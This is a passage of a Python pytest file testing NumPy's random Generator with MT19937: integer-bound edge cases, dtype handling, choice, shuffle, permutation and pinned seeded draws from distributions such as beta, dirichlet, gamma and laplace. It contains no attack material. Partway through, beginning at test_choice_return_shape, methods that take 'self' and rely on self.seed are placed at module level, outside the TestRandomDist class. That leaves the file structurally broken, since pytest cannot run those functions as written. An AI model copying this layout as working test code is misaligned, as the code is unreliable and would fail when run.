    @pytest.mark.parametrize(
        'bound, expected',
        [(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
                               3769704066, 1170797179, 4108474671])),
         (2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
                           3769704067, 1170797180, 4108474672])),
         (2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
                               1831631863, 1215661561, 3869512430]))]
    )
    def test_repeatability_32bit_boundary(self, bound, expected):
        # Known values around the 32-bit masking boundary.
        for size in [None, len(expected)]:
            random = Generator(MT19937(1234))
            x = random.integers(bound, size=size)
            assert_equal(x, expected if size is not None else expected[0])

    def test_repeatability_32bit_boundary_broadcasting(self):
        desired = np.array([[[1622936284, 3620788691, 1659384060],
                             [1417365545,  760222891, 1909653332],
                             [3788118662,  660249498, 4092002593]],
                            [[3625610153, 2979601262, 3844162757],
                             [ 685800658,  120261497, 2694012896],
                             [1207779440, 1586594375, 3854335050]],
                            [[3004074748, 2310761796, 3012642217],
                             [2067714190, 2786677879, 1363865881],
                             [ 791663441, 1867303284, 2169727960]],
                            [[1939603804, 1250951100,  298950036],
                             [1040128489, 3791912209, 3317053765],
                             [3155528714,   61360675, 2305155588]],
                            [[ 817688762, 1335621943, 3288952434],
                             [1770890872, 1102951817, 1957607470],
                             [3099996017,  798043451,   48334215]]])
        for size in [None, (5, 3, 3)]:
            random = Generator(MT19937(12345))
            x = random.integers([[-1], [0], [1]],
                                [2**32 - 1, 2**32, 2**32 + 1],
                                size=size)
            assert_array_equal(x, desired if size is not None else desired[0])

    def test_int64_uint64_broadcast_exceptions(self, endpoint):
        # Out-of-range or inverted bounds must raise for broadcast inputs,
        # including object-dtype arrays (which bypass normal casting).
        configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
                   np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
                              (-2**63-1, -2**63-1))}
        for dtype in configs:
            for config in configs[dtype]:
                low, high = config
                high = high - endpoint
                low_a = np.array([[low]*10])
                high_a = np.array([high] * 10)
                assert_raises(ValueError, random.integers, low, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_a, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low, high_a,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_a, high_a,
                              endpoint=endpoint, dtype=dtype)

                low_o = np.array([[low]*10], dtype=object)
                high_o = np.array([high] * 10, dtype=object)
                assert_raises(ValueError, random.integers, low_o, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low, high_o,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_o, high_o,
                              endpoint=endpoint, dtype=dtype)

    def test_int64_uint64_corner_case(self, endpoint):
        # When stored in Numpy arrays, `lbnd` is casted
        # as np.int64, and `ubnd` is casted as np.uint64.
        # Checking whether `lbnd` >= `ubnd` used to be
        # done solely via direct comparison, which is incorrect
        # because when Numpy tries to compare both numbers,
        # it casts both to np.float64 because there is
        # no integer superset of np.int64 and np.uint64. However,
        # `ubnd` is too large to be represented in np.float64,
        # causing it be round down to np.iinfo(np.int64).max,
        # leading to a ValueError because `lbnd` now equals
        # the new `ubnd`.

        dt = np.int64
        tgt = np.iinfo(np.int64).max
        lbnd = np.int64(np.iinfo(np.int64).max)
        ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)

        # None of these function calls should
        # generate a ValueError now.
        actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
        assert_equal(actual, tgt)

    def test_respect_dtype_singleton(self, endpoint):
        # See gh-7203
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            dt = np.bool_ if dt is bool else dt

            sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            assert_equal(sample.dtype, dt)

        for dt in (bool, int, np.compat.long):
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # gh-7284: Ensure that we get Python data types
            sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            assert not hasattr(sample, 'dtype')
            assert_equal(type(sample), dt)

    def test_respect_dtype_array(self, endpoint):
        # See gh-7203
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            dt = np.bool_ if dt is bool else dt

            sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
            assert_equal(sample.dtype, dt)
            sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
                                dtype=dt)
            assert_equal(sample.dtype, dt)

    def test_zero_size(self, endpoint):
        # See gh-7203
        for dt in self.itype:
            sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
            assert sample.shape == (3, 0, 4)
            assert sample.dtype == dt
            assert self.rfunc(0, -10, 0, endpoint=endpoint,
                              dtype=dt).shape == (0,)
            assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
                         (3, 0, 4))
            assert_equal(random.integers(0, -10, size=0).shape, (0,))
            assert_equal(random.integers(10, 10, size=0).shape, (0,))

    def test_error_byteorder(self):
        # Non-native byte order dtypes are rejected.
        other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
        with pytest.raises(ValueError):
            random.integers(0, 200, size=10, dtype=other_byteord_dt)

    # chi2max is the maximum acceptable chi-squared value.
    @pytest.mark.slow
    @pytest.mark.parametrize('sample_size,high,dtype,chi2max',
                             [(5000000, 5, np.int8, 125.0),       # p-value ~4.6e-25
                              (5000000, 7, np.uint8, 150.0),      # p-value ~7.7e-30
                              (10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
                              (50000000, 5000, np.uint16, 6500.0) # p-value ~3.5e-25
                              ])
    def test_integers_small_dtype_chisquared(self, sample_size, high,
                                             dtype, chi2max):
        # Regression test for gh-14774.
        samples = random.integers(high, size=sample_size, dtype=dtype)

        values, counts = np.unique(samples, return_counts=True)
        expected = sample_size / high
        chi2 = ((counts - expected)**2 / expected).sum()
        assert chi2 < chi2max
class TestRandomDist:
    # Make sure the random distribution returns the correct value for a
    # given seed

    def setup(self):
        # Fixed seed shared by all the exact-value tests below.
        self.seed = 1234567890

    def test_integers(self):
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2))
        desired = np.array([[-80, -56], [41, 37], [-83, -16]])
        assert_array_equal(actual, desired)

    def test_integers_masked(self):
        # Test masked rejection sampling algorithm to generate array of
        # uint32 in an interval.
        random = Generator(MT19937(self.seed))
        actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
        desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
        assert_array_equal(actual, desired)

    def test_integers_closed(self):
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
        desired = np.array([[-80, -56], [41, 38], [-83, -15]])
        assert_array_equal(actual, desired)

    def test_integers_max_int(self):
        # Tests whether integers with closed=True can generate the
        # maximum allowed Python int that can be converted
        # into a C long. Previous implementations of this
        # method have thrown an OverflowError when attempting
        # to generate this integer.
        actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
                                 endpoint=True)
        desired = np.iinfo('l').max
        assert_equal(actual, desired)

    def test_random(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.096999199829214, 0.707517457682192],
                            [0.084364834598269, 0.767731206553125],
                            [0.665069021359413, 0.715487190596693]])
        assert_array_almost_equal(actual, desired, decimal=15)

        random = Generator(MT19937(self.seed))
        actual = random.random()
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)

    def test_random_float(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.0969992, 0.70751746],
                            [0.08436483, 0.76773121],
                            [0.66506902, 0.71548719]])
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_float_scalar(self):
        random = Generator(MT19937(self.seed))
        actual = random.random(dtype=np.float32)
        desired = 0.0969992
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_unsupported_type(self):
        # Only floating dtypes are valid for random().
        assert_raises(TypeError, random.random, dtype='int32')

    def test_choice_uniform_replace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4)
        desired = np.array([0, 0, 2, 2], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_replace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
        desired = np.array([0, 1, 0, 1], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_uniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False)
        desired = np.array([2, 0, 3], dtype=np.int64)
        assert_array_equal(actual, desired)
        # shuffle=False keeps the no-replacement draw in natural order.
        actual = random.choice(4, 4, replace=False, shuffle=False)
        desired = np.arange(4, dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
        desired = np.array([0, 2, 3], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_noninteger(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(['a', 'b', 'c', 'd'], 4)
        desired = np.array(['a', 'a', 'c', 'c'])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_default_axis(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
        desired = np.array([[0, 1], [0, 1], [4, 5]])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_custom_axis(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
        desired = np.array([[0], [2], [4], [6]])
        assert_array_equal(actual, desired)

    def test_choice_exceptions(self):
        sample = random.choice
        assert_raises(ValueError, sample, -1, 3)
        assert_raises(ValueError, sample, 3., 3)
        assert_raises(ValueError, sample, [], 3)
        assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
                      p=[[0.25, 0.25], [0.25, 0.25]])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
        assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
        assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
        # gh-13087
        assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], 2,
                      replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
    # Verifies the scalar / 0-d / n-d / zero-size shape contract of choice.
    p = [0.1, 0.9]
    # Check scalar: size=None returns a scalar (identity preserved for
    # object populations).
    assert_(np.isscalar(random.choice(2, replace=True)))
    assert_(np.isscalar(random.choice(2, replace=False)))
    assert_(np.isscalar(random.choice(2, replace=True, p=p)))
    assert_(np.isscalar(random.choice(2, replace=False, p=p)))
    assert_(np.isscalar(random.choice([1, 2], replace=True)))
    assert_(random.choice([None], replace=True) is None)
    a = np.array([1, 2])
    arr = np.empty(1, dtype=object)
    arr[0] = a
    assert_(random.choice(arr, replace=True) is a)
    # Check 0-d array: size=() returns a 0-d array, not a scalar.
    s = tuple()
    assert_(not np.isscalar(random.choice(2, s, replace=True)))
    assert_(not np.isscalar(random.choice(2, s, replace=False)))
    assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
    assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
    assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
    assert_(random.choice([None], s, replace=True).ndim == 0)
    a = np.array([1, 2])
    arr = np.empty(1, dtype=object)
    arr[0] = a
    assert_(random.choice(arr, s, replace=True).item() is a)
    # Check multi dimensional array sizes are honored.
    s = (2, 3)
    p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
    assert_equal(random.choice(6, s, replace=True).shape, s)
    assert_equal(random.choice(6, s, replace=False).shape, s)
    assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
    assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
    assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
    # Check zero-size: empty draws succeed, but drawing from an empty
    # population with a nonzero size raises.
    assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
    assert_equal(random.integers(0, -10, size=0).shape, (0,))
    assert_equal(random.integers(10, 10, size=0).shape, (0,))
    assert_equal(random.choice(0, size=0).shape, (0,))
    assert_equal(random.choice([], size=(0,)).shape, (0,))
    assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
                 (3, 0, 4))
    assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
    # NaN (None-coerced) probabilities are rejected.
    a = np.array([42, 1, 2])
    p = [None, None, None]
    assert_raises(ValueError, random.choice, a, p=p)

def test_choice_p_non_contiguous(self):
    # A strided probability vector must give the same draws as its
    # contiguous copy (p is normalized internally either way).
    p = np.ones(10) / 5
    p[1::2] = 3.0
    random = Generator(MT19937(self.seed))
    non_contig = random.choice(5, 3, p=p[::2])
    random = Generator(MT19937(self.seed))
    contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
    assert_array_equal(non_contig, contig)

def test_choice_return_type(self):
    # gh-9867: integer populations always yield int64 results,
    # regardless of replacement mode or weighting.
    p = np.ones(4) / 4.
    actual = random.choice(4, 2)
    assert actual.dtype == np.int64
    actual = random.choice(4, 2, replace=False)
    assert actual.dtype == np.int64
    actual = random.choice(4, 2, p=p)
    assert actual.dtype == np.int64
    actual = random.choice(4, 2, p=p, replace=False)
    assert actual.dtype == np.int64

def test_choice_large_sample(self):
    # Large no-replacement draw pinned via an md5 of the raw buffer;
    # byteswap keeps the hash identical on big-endian platforms.
    import hashlib
    choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
    random = Generator(MT19937(self.seed))
    actual = random.choice(10000, 5000, replace=False)
    if sys.byteorder != 'little':
        actual = actual.byteswap()
    res = hashlib.md5(actual.view(np.int8)).hexdigest()
    assert_(choice_hash == res)
def test_bytes(self):
    """Generator.bytes yields the pinned 10-byte string for this seed."""
    gen = Generator(MT19937(self.seed))
    expected = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
    assert_equal(gen.bytes(10), expected)
def test_shuffle(self):
    # Test lists, arrays (of various dtypes), and multidimensional versions
    # of both, c-contiguous or not.  Each converter maps the canonical
    # 10-element input to a different container/dtype; the same pinned
    # permutation must come out of each (the first converter deliberately
    # produces an empty array, exercising the degenerate case).
    for conv in [lambda x: np.array([]),
                 lambda x: x,
                 lambda x: np.asarray(x).astype(np.int8),
                 lambda x: np.asarray(x).astype(np.float32),
                 lambda x: np.asarray(x).astype(np.complex64),
                 lambda x: np.asarray(x).astype(object),
                 lambda x: [(i, i) for i in x],
                 lambda x: np.asarray([[i, i] for i in x]),
                 lambda x: np.vstack([x, x]).T,
                 # gh-11442: recarrays shuffle correctly
                 lambda x: (np.asarray([(i, i) for i in x],
                                       [("a", int), ("b", int)])
                            .view(np.recarray)),
                 # gh-4270: structured dtypes with subarrays
                 lambda x: np.asarray([(i, i) for i in x],
                                      [("a", object, (1,)),
                                       ("b", np.int32, (1,))])]:
        random = Generator(MT19937(self.seed))
        alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
        random.shuffle(alist)
        actual = alist
        desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
        assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
    # Shuffling along axis=1 permutes columns identically in every row;
    # axis=-1 must behave the same as axis=1 for a 2-D array.
    random = Generator(MT19937(self.seed))
    actual = np.arange(16).reshape((4, 4))
    random.shuffle(actual, axis=1)
    desired = np.array([[ 0,  3,  1,  2],
                        [ 4,  7,  5,  6],
                        [ 8, 11,  9, 10],
                        [12, 15, 13, 14]])
    assert_array_equal(actual, desired)
    random = Generator(MT19937(self.seed))
    actual = np.arange(16).reshape((4, 4))
    random.shuffle(actual, axis=-1)
    assert_array_equal(actual, desired)

def test_shuffle_axis_nonsquare(self):
    # shuffle(y, axis=1) is equivalent to shuffling the transpose in place.
    y1 = np.arange(20).reshape(2, 10)
    y2 = y1.copy()
    random = Generator(MT19937(self.seed))
    random.shuffle(y1, axis=1)
    random = Generator(MT19937(self.seed))
    random.shuffle(y2.T)
    assert_array_equal(y1, y2)

def test_shuffle_masked(self):
    # gh-3263: shuffling masked arrays must preserve the multiset of
    # unmasked values (masks move with their data).
    a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
    b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
    a_orig = a.copy()
    b_orig = b.copy()
    for i in range(50):
        random.shuffle(a)
        assert_equal(
            sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
        random.shuffle(b)
        assert_equal(
            sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))

def test_shuffle_exceptions(self):
    # Out-of-range / non-integer axes raise; axis != 0 is unsupported
    # for plain (nested-list) sequences.
    random = Generator(MT19937(self.seed))
    arr = np.arange(10)
    assert_raises(np.AxisError, random.shuffle, arr, 1)
    arr = np.arange(9).reshape((3, 3))
    assert_raises(np.AxisError, random.shuffle, arr, 3)
    assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
    arr = [[1, 2, 3], [4, 5, 6]]
    assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
    # permutation() returns a shuffled copy: same pinned order for a list
    # and for a column vector; strings/floats raise; an integer argument
    # permutes arange(n).
    random = Generator(MT19937(self.seed))
    alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
    actual = random.permutation(alist)
    desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
    assert_array_equal(actual, desired)
    random = Generator(MT19937(self.seed))
    arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
    actual = random.permutation(arr_2d)
    assert_array_equal(actual, np.atleast_2d(desired).T)
    bad_x_str = "abcd"
    assert_raises(np.AxisError, random.permutation, bad_x_str)
    bad_x_float = 1.2
    assert_raises(np.AxisError, random.permutation, bad_x_float)
    random = Generator(MT19937(self.seed))
    integer_val = 10
    desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
    actual = random.permutation(integer_val)
    assert_array_equal(actual, desired)

def test_permutation_custom_axis(self):
    # axis=1 and axis=-1 are equivalent for a 2-D input and leave the
    # original array untouched (copy semantics).
    a = np.arange(16).reshape((4, 4))
    desired = np.array([[ 0,  3,  1,  2],
                        [ 4,  7,  5,  6],
                        [ 8, 11,  9, 10],
                        [12, 15, 13, 14]])
    random = Generator(MT19937(self.seed))
    actual = random.permutation(a, axis=1)
    assert_array_equal(actual, desired)
    random = Generator(MT19937(self.seed))
    actual = random.permutation(a, axis=-1)
    assert_array_equal(actual, desired)

def test_permutation_exceptions(self):
    # Same axis validation as shuffle.
    random = Generator(MT19937(self.seed))
    arr = np.arange(10)
    assert_raises(np.AxisError, random.permutation, arr, 1)
    arr = np.arange(9).reshape((3, 3))
    assert_raises(np.AxisError, random.permutation, arr, 3)
    assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
    # Pinned beta(.1, .9) draws for the fixture seed.
    random = Generator(MT19937(self.seed))
    actual = random.beta(.1, .9, size=(3, 2))
    desired = np.array(
        [[1.083029353267698e-10, 2.449965303168024e-11],
         [2.397085162969853e-02, 3.590779671820755e-08],
         [2.830254190078299e-04, 1.744709918330393e-01]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_binomial(self):
    # Non-integer n (100.123) is accepted and truncated; array and
    # scalar calls pinned.
    random = Generator(MT19937(self.seed))
    actual = random.binomial(100.123, .456, size=(3, 2))
    desired = np.array([[42, 41],
                        [42, 48],
                        [44, 50]])
    assert_array_equal(actual, desired)
    random = Generator(MT19937(self.seed))
    actual = random.binomial(100.123, .456)
    desired = 42
    assert_array_equal(actual, desired)

def test_chisquare(self):
    # Pinned chisquare(df=50) draws.
    random = Generator(MT19937(self.seed))
    actual = random.chisquare(50, size=(3, 2))
    desired = np.array([[32.9850547060149, 39.0219480493301],
                        [56.2006134779419, 57.3474165711485],
                        [55.4243733880198, 55.4209797925213]])
    assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
    # Pinned dirichlet draws for a 2-element alpha; negative alpha raises;
    # a size=None draw equals the first pinned row pair.
    random = Generator(MT19937(self.seed))
    alpha = np.array([51.72840233779265162, 39.74494232180943953])
    actual = random.dirichlet(alpha, size=(3, 2))
    desired = np.array([[[0.5439892869558927, 0.45601071304410745],
                         [0.5588917345860708, 0.4411082654139292 ]],
                        [[0.5632074165063435, 0.43679258349365657],
                         [0.54862581112627, 0.45137418887373015]],
                        [[0.49961831357047226, 0.5003816864295278 ],
                         [0.52374806183482, 0.47625193816517997]]])
    assert_array_almost_equal(actual, desired, decimal=15)
    bad_alpha = np.array([5.4e-01, -1.0e-16])
    assert_raises(ValueError, random.dirichlet, bad_alpha)
    random = Generator(MT19937(self.seed))
    alpha = np.array([51.72840233779265162, 39.74494232180943953])
    actual = random.dirichlet(alpha)
    assert_array_almost_equal(actual, desired[0, 0], decimal=15)

def test_dirichlet_size(self):
    # gh-3173: size may be a numpy integer, list, tuple, or array;
    # a float size raises.
    p = np.array([51.72840233779265162, 39.74494232180943953])
    assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
    assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
    assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
    assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
    assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
    assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
    assert_raises(TypeError, random.dirichlet, p, float(1))

def test_dirichlet_bad_alpha(self):
    # gh-2089: negative alpha raises; gh-15876: alpha must be 1-D.
    alpha = np.array([5.4e-01, -1.0e-16])
    assert_raises(ValueError, random.dirichlet, alpha)
    assert_raises(ValueError, random.dirichlet, [[5, 1]])
    assert_raises(ValueError, random.dirichlet, [[5], [1]])
    assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
    assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))

def test_dirichlet_alpha_non_contiguous(self):
    # A strided alpha must produce the same stream as its contiguous copy.
    a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
    alpha = a[::2]
    random = Generator(MT19937(self.seed))
    non_contig = random.dirichlet(alpha, size=(3, 2))
    random = Generator(MT19937(self.seed))
    contig = random.dirichlet(np.ascontiguousarray(alpha),
                              size=(3, 2))
    assert_array_almost_equal(non_contig, contig)

def test_dirichlet_small_alpha(self):
    # Tiny alphas collapse the distribution onto a vertex; all mass on
    # the first component for this ratio.
    eps = 1.0e-9  # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
    alpha = eps * np.array([1., 1.0e-3])
    random = Generator(MT19937(self.seed))
    actual = random.dirichlet(alpha, size=(3, 2))
    expected = np.array([
        [[1., 0.],
         [1., 0.]],
        [[1., 0.],
         [1., 0.]],
        [[1., 0.],
         [1., 0.]]
    ])
    assert_array_almost_equal(actual, expected, decimal=15)

@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
    # Use alpha.max() < 0.1 to trigger stick breaking code path;
    # sample mean must converge to alpha / alpha.sum().
    alpha = np.array([0.02, 0.04, 0.03])
    exact_mean = alpha / alpha.sum()
    random = Generator(MT19937(self.seed))
    sample = random.dirichlet(alpha, size=20000000)
    sample_mean = sample.mean(axis=0)
    assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
    # Pinned exponential(scale=1.1234) draws.
    random = Generator(MT19937(self.seed))
    actual = random.exponential(1.1234, size=(3, 2))
    desired = np.array([[0.098845481066258, 1.560752510746964],
                        [0.075730916041636, 1.769098974710777],
                        [1.488602544592235, 2.49684815275751 ]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_exponential_0(self):
    # scale=0 degenerates to 0; negative zero is rejected.
    assert_equal(random.exponential(scale=0), 0)
    assert_raises(ValueError, random.exponential, scale=-0.)

def test_f(self):
    # Pinned F(12, 77) draws.
    random = Generator(MT19937(self.seed))
    actual = random.f(12, 77, size=(3, 2))
    desired = np.array([[0.461720027077085, 1.100441958872451],
                        [1.100337455217484, 0.91421736740018 ],
                        [0.500811891303113, 0.826802454552058]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_gamma(self):
    # Pinned gamma(shape=5, scale=3) draws.
    random = Generator(MT19937(self.seed))
    actual = random.gamma(5, 3, size=(3, 2))
    desired = np.array([[ 5.03850858902096,  7.9228656732049 ],
                        [18.73983605132985, 19.57961681699238],
                        [18.17897755150825, 18.17653912505234]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_gamma_0(self):
    # Degenerate parameters give 0; negative zero parameters raise.
    assert_equal(random.gamma(shape=0, scale=0), 0)
    assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)

def test_geometric(self):
    # Pinned geometric(p=.123456789) draws.
    random = Generator(MT19937(self.seed))
    actual = random.geometric(.123456789, size=(3, 2))
    desired = np.array([[ 1, 10],
                        [ 1, 12],
                        [ 9, 10]])
    assert_array_equal(actual, desired)

def test_geometric_exceptions(self):
    # p > 1, p < 0 and NaN p all raise, scalar or vectorized.
    assert_raises(ValueError, random.geometric, 1.1)
    assert_raises(ValueError, random.geometric, [1.1] * 10)
    assert_raises(ValueError, random.geometric, -0.1)
    assert_raises(ValueError, random.geometric, [-0.1] * 10)
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.geometric, np.nan)
        assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
    # Pinned gumbel draws.
    random = Generator(MT19937(self.seed))
    actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[ 4.688397515056245, -0.289514845417841],
                        [ 4.981176042584683, -0.633224272589149],
                        [-0.055915275687488, -0.333962478257953]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_gumbel_0(self):
    # scale=0 collapses to loc (0 here); negative zero scale raises.
    assert_equal(random.gumbel(scale=0), 0)
    assert_raises(ValueError, random.gumbel, scale=-0.)

def test_hypergeometric(self):
    # Pinned draws; non-integer good/bad counts are truncated.
    random = Generator(MT19937(self.seed))
    actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
    desired = np.array([[ 9, 9],
                        [ 9, 9],
                        [10, 9]])
    assert_array_equal(actual, desired)
    # Test nbad = 0: every draw is all-good.
    actual = random.hypergeometric(5, 0, 3, size=4)
    desired = np.array([3, 3, 3, 3])
    assert_array_equal(actual, desired)
    actual = random.hypergeometric(15, 0, 12, size=4)
    desired = np.array([12, 12, 12, 12])
    assert_array_equal(actual, desired)
    # Test ngood = 0: every draw is zero.
    actual = random.hypergeometric(0, 5, 3, size=4)
    desired = np.array([0, 0, 0, 0])
    assert_array_equal(actual, desired)
    actual = random.hypergeometric(0, 15, 12, size=4)
    desired = np.array([0, 0, 0, 0])
    assert_array_equal(actual, desired)

def test_laplace(self):
    # Pinned laplace draws.
    random = Generator(MT19937(self.seed))
    actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-3.156353949272393, 1.195863024830054],
                        [-3.435458081645966, 1.656882398925444],
                        [ 0.924824032467446, 1.251116432209336]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_laplace_0(self):
    # Degenerate scale; negative zero raises.
    assert_equal(random.laplace(scale=0), 0)
    assert_raises(ValueError, random.laplace, scale=-0.)

def test_logistic(self):
    # Pinned logistic draws.
    random = Generator(MT19937(self.seed))
    actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-4.338584631510999, 1.890171436749954],
                        [-4.64547787337966 , 2.514545562919217],
                        [ 1.495389489198666, 1.967827627577474]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_lognormal(self):
    # Pinned lognormal draws.
    random = Generator(MT19937(self.seed))
    actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
    desired = np.array([[ 0.0268252166335, 13.9534486483053],
                        [ 0.1204014788936,  2.2422077497792],
                        [ 4.2484199496128, 12.0093343977523]])
    assert_array_almost_equal(actual, desired, decimal=13)

def test_lognormal_0(self):
    # sigma=0 gives exp(0) == 1; negative zero sigma raises.
    assert_equal(random.lognormal(sigma=0), 1)
    assert_raises(ValueError, random.lognormal, sigma=-0.)

def test_logseries(self):
    # Pinned logseries draws.
    random = Generator(MT19937(self.seed))
    actual = random.logseries(p=.923456789, size=(3, 2))
    desired = np.array([[14, 17],
                        [3, 18],
                        [5, 1]])
    assert_array_equal(actual, desired)

def test_logseries_exceptions(self):
    # NaN p raises, scalar or vectorized.
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.logseries, np.nan)
        assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
    # Pinned multinomial draws: 20 trials over 6 equiprobable categories.
